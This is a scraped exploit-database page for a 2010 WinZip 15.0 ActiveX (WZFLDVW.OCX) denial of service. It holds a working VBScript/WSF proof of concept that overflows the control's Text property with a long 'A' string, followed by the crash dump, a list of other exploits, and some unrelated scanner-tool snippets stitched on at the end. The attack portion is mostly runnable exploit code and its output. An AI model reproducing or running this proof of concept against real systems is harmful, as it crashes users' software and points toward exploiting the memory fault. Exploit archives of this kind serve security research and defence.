Menu

Search for hundreds of thousands of exploits

"WinZip 15.0 - WZFLDVW.OCX Text Property Denial of Service"

Author

Exploit author

"Fady Mohammed Osman"

Platform

Exploit platform

windows

Release date

Exploit published date

2010-12-06

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
# Exploit Title: Winzip WZFLDVW.OCX text property access violation
# Author: fady mohamed osman
# Software Link : http://www.winzip.com/downwz.htm
# Version:  15.0 (Build 9334)
# Tested on: Win XP Sp2
# CVE : N/A

# Website : http://www.darkmasters.co.cc/
# Twitter : http://twitter.com/Fady_Osman

<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:4E3770F4-1937-4F05-B9A2-959BE7321909' id='target' />
<script language='vbscript'>


'Wscript.echo typename(target)

'for debugging/custom prolog
targetFile = "C:\Program Files\WinZip\WZFLDVW.OCX"
prototype  = "Invoke_Unknown Text As String"
memberName = "Text"
progid     = "FolderViewControl.TreeNode"
argCount   = 1

arg1=String(1044, "A")

target.Text = arg1

</script></job></package>

Exception Code: ACCESS_VIOLATION
Disasm: 1643D05	PUSH DWORD PTR [ECX+20]

Seh Chain:
--------------------------------------------------
1 	180B82F 	wzfldvw.ocx
2 	180B8F0 	wzfldvw.ocx
3 	73351571 	VBSCRIPT.dll
4 	73350F38 	VBSCRIPT.dll
5 	73351DA5 	VBSCRIPT.dll
6 	7335119D 	VBSCRIPT.dll
7 	7C8399F3 	KERNEL32.dll


Called From                   Returns To                    
--------------------------------------------------
wzfldvw.1643D05               wzfldvw.16314E1               
wzfldvw.16314E1               wzfldvw.1666F8C               
wzfldvw.1666F8C               wzfldvw.16434A0               
wzfldvw.16434A0               VBSCRIPT.73313A78             
VBSCRIPT.73313A78             VBSCRIPT.733139F6             
VBSCRIPT.733139F6             VBSCRIPT.73304B01             
VBSCRIPT.73304B01             VBSCRIPT.73306959             
VBSCRIPT.73306959             VBSCRIPT.73301E55             
VBSCRIPT.73301E55             VBSCRIPT.73303A76             
VBSCRIPT.73303A76             VBSCRIPT.7330BE2A             
VBSCRIPT.7330BE2A             VBSCRIPT.7330BEB9             
VBSCRIPT.7330BEB9             SCROBJ.5CE4915E               
SCROBJ.5CE4915E               SCROBJ.5CE4CF9C               
SCROBJ.5CE4CF9C               SCROBJ.5CE4D0E2               
SCROBJ.5CE4D0E2               SCROBJ.5CE4B106               
SCROBJ.5CE4B106               SCROBJ.5CE4B49F               
SCROBJ.5CE4B49F               100BB36                       
100BB36                       1005EFE                       
1005EFE                       1005215                       
1005215                       100492B                       
100492B                       1004A89                       
1004A89                       1003C7B                       
1003C7B                       KERNEL32.7C816D4F             


Registers:
--------------------------------------------------
EIP 01643D05 -> 00000001
EAX 0013EB1C -> 00000001
EBX 00000000
ECX BAADF00D
EDX 01642B94 -> 18EBD88B
EDI 00000008
ESI 0013EB70 -> 01666F8C
EBP 0013EB44 -> 0013EB6C
ESP 0013EB10 -> 0000113F


Block Disassembly: 
--------------------------------------------------
1643CF4	MOV EAX,[EBP+24]
1643CF7	MOV [EBP-4],EAX
1643CFA	LEA EAX,[EBP-28]
1643CFD	PUSH EAX
1643CFE	PUSH 0
1643D00	PUSH 113F
1643D05	PUSH DWORD PTR [ECX+20]	  <--- CRASH
1643D08	CALL [182CA6C]
1643D0E	LEAVE
1643D0F	RETN 20
1643D12	MOV EDI,EDI
1643D14	PUSH EBP
1643D15	MOV EBP,ESP
1643D17	SUB ESP,3C
1643D1A	MOV EAX,[EBP+8]


ArgDump:
--------------------------------------------------
EBP+8	BAADF00D
EBP+12	00000001
EBP+16	0019B05C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+20	00000000
EBP+24	00000000
EBP+28	00000000


Stack Dump:
--------------------------------------------------
13EB10 3F 11 00 00 00 00 00 00 1C EB 13 00 01 00 00 00  [................]
13EB20 0D F0 AD BA 00 00 00 00 00 00 00 00 5C B0 19 00  [............\...]
13EB30 D0 EB 13 00 00 00 00 00 00 00 00 00 08 EC 13 00  [................]
13EB40 00 00 00 00 6C EB 13 00 E1 14 63 01 0D F0 AD BA  [....l.....c.....]
13EB50 01 00 00 00 5C B0 19 00 00 00 00 00 00 00 00 00  [....\...........]



ApiLog
--------------------------------------------------

***** Installing Hooks *****
7c826cab     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
7c826cab     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2019-01-25 "Lua 5.3.5 - 'debug.upvaluejoin' Use After Free" dos multiple "Fady Mohammed Osman"
2017-01-21 "Microsoft Power Point 2016 - Java Code Execution" local windows "Fady Mohammed Osman"
2017-01-17 "Check Box 2016 Q2 Survey - Multiple Vulnerabilities" webapps aspx "Fady Mohammed Osman"
2017-01-02 "Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)" remote windows "Fady Mohammed Osman"
2015-06-29 "Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Change" webapps hardware "Fady Mohammed Osman"
2015-06-29 "Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Disclosure" webapps hardware "Fady Mohammed Osman"
2015-04-27 "Apple iTunes 10.6.1.7 - '.pls' Title Buffer Overflow" local windows "Fady Mohammed Osman"
2015-03-24 "Bsplayer 2.68 - HTTP Response Universal" remote windows "Fady Mohammed Osman"
2014-12-02 "ProjectSend r-561 - Arbitrary File Upload" webapps php "Fady Mohammed Osman"
2014-12-02 "SQL Buddy 1.3.3 - Remote Code Execution" webapps php "Fady Mohammed Osman"
2014-10-06 "Bash CGI - 'Shellshock' Remote Command Injection (Metasploit)" webapps cgi "Fady Mohammed Osman"
2011-12-27 "CoCSoft Stream Down 6.8.0 - Universal (Metasploit)" remote windows "Fady Mohammed Osman"
2010-12-06 "WinZip 15.0 - WZFLDVW.OCX Text Property Denial of Service" dos windows "Fady Mohammed Osman"
2010-12-06 "WinZip 15.0 - WZFLDVW.OCX IconIndex Property Denial of Service" dos windows "Fady Mohammed Osman"
2010-08-14 "Saurus CMS Admin Panel - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php "Fady Mohammed Osman" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected